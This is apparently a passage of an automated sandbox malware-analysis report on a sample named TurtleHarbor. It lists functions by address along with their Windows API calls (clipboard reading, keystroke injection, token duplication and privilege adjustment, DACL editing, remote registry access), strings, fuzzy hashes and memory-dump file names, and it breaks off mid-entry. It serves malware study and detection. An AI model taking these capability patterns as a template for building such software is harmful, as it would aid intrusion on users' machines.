Instruction ID: dd0fcf6e53f961b02a767626198cf9d42760f1760ad8fa82aec65456eea7f4a2
Opcode Fuzzy Hash: 9414b72ab1f729aa83c5e22003f1812677b4f614ee73623703a0473235c35565
Instruction Fuzzy Hash: B2D05EB190032C2BDB64E6A5AC4DDB77BACE745220F0006A17C5CC3101E9249D458AE0

Function 0033547B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00335486

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 3c97f7c5414a111479f9aa3779f1108c24abc0904b6f66b3dd48c850f52de919
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 8AB0927644420C77CE022A82EC03A593B299B40668F408020FB0C5C162A673A6A09689

Function 00333588 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

_doexit.LIBCMT ref: 00333592

Part of subcall function 00333459: __lock.LIBCMT ref: 00333467
Part of subcall function 00333459: DecodePointer.KERNEL32(003CCB70,0000001C,003333B2,00331003,00000001,00000000,?,00333300,000000FF,?,00339E5E,00000011,00331003,?,00339CAC,0000000D), ref: 003334A6
Part of subcall function 00333459: DecodePointer.KERNEL32(?,00333300,000000FF,?,00339E5E,00000011,00331003,?,00339CAC,0000000D), ref: 003334B7
Part of subcall function 00333459: EncodePointer.KERNEL32(00000000,?,00333300,000000FF,?,00339E5E,00000011,00331003,?,00339CAC,0000000D), ref: 003334D0
Part of subcall function 00333459: DecodePointer.KERNEL32(-00000004,?,00333300,000000FF,?,00339E5E,00000011,00331003,?,00339CAC,0000000D), ref: 003334E0
Part of subcall function 00333459: EncodePointer.KERNEL32(00000000,?,00333300,000000FF,?,00339E5E,00000011,00331003,?,00339CAC,0000000D), ref: 003334E6
Part of subcall function 00333459: DecodePointer.KERNEL32(?,00333300,000000FF,?,00339E5E,00000011,00331003,?,00339CAC,0000000D), ref: 003334FC
Part of subcall function 00333459: DecodePointer.KERNEL32(?,00333300,000000FF,?,00339E5E,00000011,00331003,?,00339CAC,0000000D), ref: 00333507

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Pointer$Decode$Encode$__lock_doexit
String ID:
API String ID: 2158581194-0
Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction ID: 6e95f824bb6da6c12c590e90b0127ad6922e7dd7d24edc0d12089f6d7434b04b
Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction Fuzzy Hash: F0B0123198030C33EA122642EC03F153B0C4B40B50F104020FA0C1C1E1A9D3B66040C9

Non-executed Functions

Function 0039D164 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 003129E2: GetWindowLongW.USER32(?,000000EB), ref: 003129F3

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0039D208
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0039D249
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0039D28E
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0039D2B8
SendMessageW.USER32 ref: 0039D2E1
_wcsncpy.LIBCMT ref: 0039D359
GetKeyState.USER32(00000011), ref: 0039D37A
GetKeyState.USER32(00000009), ref: 0039D387
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0039D39D
GetKeyState.USER32(00000010), ref: 0039D3A7
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0039D3D0
SendMessageW.USER32 ref: 0039D3F7
SendMessageW.USER32(?,00001030,?,0039B9BA), ref: 0039D4FD
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0039D513
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0039D526
SetCapture.USER32(?), ref: 0039D52F
ClientToScreen.USER32(?,?), ref: 0039D594
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0039D5A1
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0039D5BB
ReleaseCapture.USER32 ref: 0039D5C6
GetCursorPos.USER32(?), ref: 0039D600
ScreenToClient.USER32(?,?), ref: 0039D60D
SendMessageW.USER32(?,00001012,00000000,?), ref: 0039D669
SendMessageW.USER32 ref: 0039D697
SendMessageW.USER32(?,00001111,00000000,?), ref: 0039D6D4
SendMessageW.USER32 ref: 0039D703
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0039D724
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0039D733
GetCursorPos.USER32(?), ref: 0039D753
ScreenToClient.USER32(?,?), ref: 0039D760
GetParent.USER32(?), ref: 0039D780
SendMessageW.USER32(?,00001012,00000000,?), ref: 0039D7E9
SendMessageW.USER32 ref: 0039D81A
ClientToScreen.USER32(?,?), ref: 0039D878
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0039D8A8
SendMessageW.USER32(?,00001111,00000000,?), ref: 0039D8D2
SendMessageW.USER32 ref: 0039D8F5
ClientToScreen.USER32(?,?), ref: 0039D947
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0039D97B

Part of subcall function 003129AB: GetWindowLongW.USER32(?,000000EB), ref: 003129BC

GetWindowLongW.USER32(?,000000F0), ref: 0039DA17

Strings

F, xrefs: 0039D8FB
@GUI_DRAGID, xrefs: 0039D562

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: 71af700661660b5ad1592b7d27dfef07a873512cbd443f076f3fcc9d93e6ed5b
Instruction ID: c60ffedbb74419fec7e4189b1189077f4aaa976245a485309ca21d2aa6c15aef
Opcode Fuzzy Hash: 71af700661660b5ad1592b7d27dfef07a873512cbd443f076f3fcc9d93e6ed5b
Instruction Fuzzy Hash: EC42D135208341AFCB26DF28C885FAABBE9FF4A310F15061DF6958B2A1D771D854CB52

Function 00325EDA Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00325EE2
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003610D7
IsIconic.USER32(?), ref: 003610E0
ShowWindow.USER32(?,00000009), ref: 003610ED
SetForegroundWindow.USER32(?), ref: 003610F7
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0036110D
GetCurrentThreadId.KERNEL32 ref: 00361114
GetWindowThreadProcessId.USER32(?,00000000), ref: 00361120
AttachThreadInput.USER32(?,00000000,00000001), ref: 00361131
AttachThreadInput.USER32(?,00000000,00000001), ref: 00361139
AttachThreadInput.USER32(00000000,?,00000001), ref: 00361141
SetForegroundWindow.USER32(?), ref: 00361144
MapVirtualKeyW.USER32(00000012,00000000), ref: 00361159
keybd_event.USER32(00000012,00000000), ref: 00361164
MapVirtualKeyW.USER32(00000012,00000000), ref: 0036116E
keybd_event.USER32(00000012,00000000), ref: 00361173
MapVirtualKeyW.USER32(00000012,00000000), ref: 0036117C
keybd_event.USER32(00000012,00000000), ref: 00361181
MapVirtualKeyW.USER32(00000012,00000000), ref: 0036118B
keybd_event.USER32(00000012,00000000), ref: 00361190
SetForegroundWindow.USER32(?), ref: 00361193
AttachThreadInput.USER32(?,?,00000000), ref: 003611BA

Strings

Shell_TrayWnd, xrefs: 003610D2

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: aa0e2fbd384f9f572281d0f73bd2334363fb7aeeb8bef9f6be29c93bda9263d9
Instruction ID: d9b62722b9e4b8ec96e3eed358d7406b17e5be03d8d5fe8b8b616e368c346821
Opcode Fuzzy Hash: aa0e2fbd384f9f572281d0f73bd2334363fb7aeeb8bef9f6be29c93bda9263d9
Instruction Fuzzy Hash: 94319271A40318BFEB266B619C4AF7F3F6CEB46B50F154015FA04EA1D1DAB05D50AFA0

Function 00368F2E Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00369399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003693E3
Part of subcall function 00369399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00369410
Part of subcall function 00369399: GetLastError.KERNEL32 ref: 0036941D

_memset.LIBCMT ref: 00368F71
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00368FC3
CloseHandle.KERNEL32(?), ref: 00368FD4
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00368FEB
GetProcessWindowStation.USER32 ref: 00369004
SetProcessWindowStation.USER32(00000000), ref: 0036900E
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00369028

Part of subcall function 00368DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00368F27), ref: 00368DFE
Part of subcall function 00368DE9: CloseHandle.KERNEL32(?,?,00368F27), ref: 00368E10

Strings

winsta0, xrefs: 00368FE6
default, xrefs: 00369023
, xrefs: 00368F80

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: ab052dc39df078ee97058cab4c2f94bb641252f36c2bb1ed1eb93c09cbbfb50f
Instruction ID: 1d373dec5a29873f739fecbc7dfc42f2ea850931d407aefba89097f0b23c707e
Opcode Fuzzy Hash: ab052dc39df078ee97058cab4c2f94bb641252f36c2bb1ed1eb93c09cbbfb50f
Instruction Fuzzy Hash: 66817BB1900209BFDF129FA4CC49AFE7B7DEF0A304F15815AF910A6264DB328E15DB20

Function 00384632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(003A0980), ref: 0038465C
IsClipboardFormatAvailable.USER32(0000000D), ref: 0038466A
GetClipboardData.USER32(0000000D), ref: 00384672
CloseClipboard.USER32 ref: 0038467E
GlobalLock.KERNEL32(00000000), ref: 0038469A
CloseClipboard.USER32 ref: 003846A4
GlobalUnlock.KERNEL32(00000000,00000000), ref: 003846B9
IsClipboardFormatAvailable.USER32(00000001), ref: 003846C6
GetClipboardData.USER32(00000001), ref: 003846CE
GlobalLock.KERNEL32(00000000), ref: 003846DB
GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 0038470F
CloseClipboard.USER32 ref: 0038481F

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 1be524ac06d22dcefa3b0209dfff9d25474565bdd99749d68d3b1e30ae7b7f1f
Instruction ID: 8adcf00384dd7e5b4133441660d544383abadc638174534a04e68cba247ee745
Opcode Fuzzy Hash: 1be524ac06d22dcefa3b0209dfff9d25474565bdd99749d68d3b1e30ae7b7f1f
Instruction Fuzzy Hash: 7851AD31244302ABD307FF60EC89F6E77ACAF99B50F014529F656D61A1EF30D9058B62

Function 0037F5D8 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0037F5F9
_wcscmp.LIBCMT ref: 0037F60E
_wcscmp.LIBCMT ref: 0037F625
GetFileAttributesW.KERNEL32(?), ref: 0037F637
SetFileAttributesW.KERNEL32(?,?), ref: 0037F651
FindNextFileW.KERNEL32(00000000,?), ref: 0037F669
FindClose.KERNEL32(00000000), ref: 0037F674
FindFirstFileW.KERNEL32(*.*,?), ref: 0037F690
_wcscmp.LIBCMT ref: 0037F6B7
_wcscmp.LIBCMT ref: 0037F6CE
SetCurrentDirectoryW.KERNEL32(?), ref: 0037F6E0
SetCurrentDirectoryW.KERNEL32(003CB578), ref: 0037F6FE
FindNextFileW.KERNEL32(00000000,00000010), ref: 0037F708
FindClose.KERNEL32(00000000), ref: 0037F715
FindClose.KERNEL32(00000000), ref: 0037F727

Strings

S7, xrefs: 0037F6E2
*.*, xrefs: 0037F68B

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*$S7
API String ID: 1803514871-1017210279
Opcode ID: 1da77f104244678b2f13ff5afdc5cd4bcb1a80bf59c4b51fe78d27c35613e365
Instruction ID: 20086ab3153396d377f86b3b8159cc4e7c0769b405aab0958a0ccc1bf0da61d9
Opcode Fuzzy Hash: 1da77f104244678b2f13ff5afdc5cd4bcb1a80bf59c4b51fe78d27c35613e365
Instruction Fuzzy Hash: D33196716412196FDB269FB4DC89EEE77ACAF4A361F118165F808E21A0DB34DE44CB60

Function 0037CD9F Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0037CDD0
FindClose.KERNEL32(00000000), ref: 0037CE24
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0037CE49
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0037CE60
FileTimeToSystemTime.KERNEL32(?,?), ref: 0037CE87
__swprintf.LIBCMT ref: 0037CED3
__swprintf.LIBCMT ref: 0037CF16

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

__swprintf.LIBCMT ref: 0037CF6A

Part of subcall function 003338C8: __woutput_l.LIBCMT ref: 00333921

__swprintf.LIBCMT ref: 0037CFB8

Part of subcall function 003338C8: __flsbuf.LIBCMT ref: 00333943
Part of subcall function 003338C8: __flsbuf.LIBCMT ref: 0033395B

__swprintf.LIBCMT ref: 0037D007
__swprintf.LIBCMT ref: 0037D056
__swprintf.LIBCMT ref: 0037D0A5

Strings

%4d, xrefs: 0037CF10
%4d%02d%02d%02d%02d%02d, xrefs: 0037CECD
%02d, xrefs: 0037CF5E, 0037CF68, 0037CFB6, 0037D005, 0037D054, 0037D0A3

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 6e4c87b7df31fb2aae0c820b9ee8b407e3f475c62c80b03bbbfca93aec580760
Instruction ID: 1cdd61970c01ca4620a5fda10341f2b8af208b6c5f3001cb9e4684fa8cc27d27
Opcode Fuzzy Hash: 6e4c87b7df31fb2aae0c820b9ee8b407e3f475c62c80b03bbbfca93aec580760
Instruction Fuzzy Hash: 48A16EB1404304ABC716EFA4D985DAFB7ECAF99701F40491DF595CB191EB30DA48CBA2

Function 00390EB7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00390FB3
RegCreateKeyExW.ADVAPI32(?,?,00000000,003A0980,00000000,?,00000000,?,?), ref: 00391021
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00391069
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 003910F2
RegCloseKey.ADVAPI32(?), ref: 00391412
RegCloseKey.ADVAPI32(00000000), ref: 0039141F

Strings

REG_QWORD, xrefs: 00391360
REG_DWORD, xrefs: 003912E3
REG_BINARY, xrefs: 003913AD
REG_MULTI_SZ, xrefs: 003911DA
REG_EXPAND_SZ, xrefs: 0039108F
REG_SZ, xrefs: 00391130

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 88d664f97dc3869e04adb1734c7647e8629eb9813fd0b86aae11e199ed4dff50
Instruction ID: 40bc887510e4ae3ffd6061a9a2382c1c4bcd21ade28b96da1cecabeeb243b477
Opcode Fuzzy Hash: 88d664f97dc3869e04adb1734c7647e8629eb9813fd0b86aae11e199ed4dff50
Instruction Fuzzy Hash: C3026A752006119FCB1AEF25D881E6AB7E5FF89710F05895CF88A9B362DB30ED41CB91

Function 0037F735 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0037F756
_wcscmp.LIBCMT ref: 0037F76B
_wcscmp.LIBCMT ref: 0037F782

Part of subcall function 00374875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00374890

FindNextFileW.KERNEL32(00000000,?), ref: 0037F7B1
FindClose.KERNEL32(00000000), ref: 0037F7BC
FindFirstFileW.KERNEL32(*.*,?), ref: 0037F7D8
_wcscmp.LIBCMT ref: 0037F7FF
_wcscmp.LIBCMT ref: 0037F816
SetCurrentDirectoryW.KERNEL32(?), ref: 0037F828
SetCurrentDirectoryW.KERNEL32(003CB578), ref: 0037F846
FindNextFileW.KERNEL32(00000000,00000010), ref: 0037F850
FindClose.KERNEL32(00000000), ref: 0037F85D
FindClose.KERNEL32(00000000), ref: 0037F86F

Strings

j7, xrefs: 0037F82A
*.*, xrefs: 0037F7D3

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*$j7
API String ID: 1824444939-2425405264
Opcode ID: 8a198a82d79f3e9739babe65153616f012124091743eff0fe65737974f91e881
Instruction ID: 779aefea342239cd9fcbe03c46c38058d4422a1a6ad724da7bcb5bd9ffd08314
Opcode Fuzzy Hash: 8a198a82d79f3e9739babe65153616f012124091743eff0fe65737974f91e881
Instruction Fuzzy Hash: 2931E5715002597EDB269FB4DC89AEE77ACAF0A321F118165F808E21A1DB34CE45CB61

Function 003688CD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00368E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00368E3C
Part of subcall function 00368E20: GetLastError.KERNEL32(?,00368900,?,?,?), ref: 00368E46
Part of subcall function 00368E20: GetProcessHeap.KERNEL32(00000008,?,?,00368900,?,?,?), ref: 00368E55
Part of subcall function 00368E20: HeapAlloc.KERNEL32(00000000,?,00368900,?,?,?), ref: 00368E5C
Part of subcall function 00368E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00368E73

Part of subcall function 00368EBD: GetProcessHeap.KERNEL32(00000008,00368916,00000000,00000000,?,00368916,?), ref: 00368EC9
Part of subcall function 00368EBD: HeapAlloc.KERNEL32(00000000,?,00368916,?), ref: 00368ED0
Part of subcall function 00368EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00368916,?), ref: 00368EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00368931
_memset.LIBCMT ref: 00368946
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00368965
GetLengthSid.ADVAPI32(?), ref: 00368976
GetAce.ADVAPI32(?,00000000,?), ref: 003689B3
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003689CF
GetLengthSid.ADVAPI32(?), ref: 003689EC
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 003689FB
HeapAlloc.KERNEL32(00000000), ref: 00368A02
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00368A23
CopySid.ADVAPI32(00000000), ref: 00368A2A
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00368A5B
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00368A81
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00368A95

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: deb7fb0923a29c1749b8e5ff89e6bf8fdeb6138a87f413506ceecdd83807636a
Instruction ID: 276953895f18733f534d635b3e387a11bb610a177c50f1cdf6fd0e20ed967a03
Opcode Fuzzy Hash: deb7fb0923a29c1749b8e5ff89e6bf8fdeb6138a87f413506ceecdd83807636a
Instruction Fuzzy Hash: DA613A75900209BFDF06DFA5DC45EFEBBB9FF09304F04822AE915A6290DB759A05CB60

Function 00390A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0039147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0039040D,?,?), ref: 00391491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00390B0C

Part of subcall function 00314D37: __itow.LIBCMT ref: 00314D62
Part of subcall function 00314D37: __swprintf.LIBCMT ref: 00314DAC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00390BAB
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00390C43
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00390E82
RegCloseKey.ADVAPI32(00000000), ref: 00390E8F

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
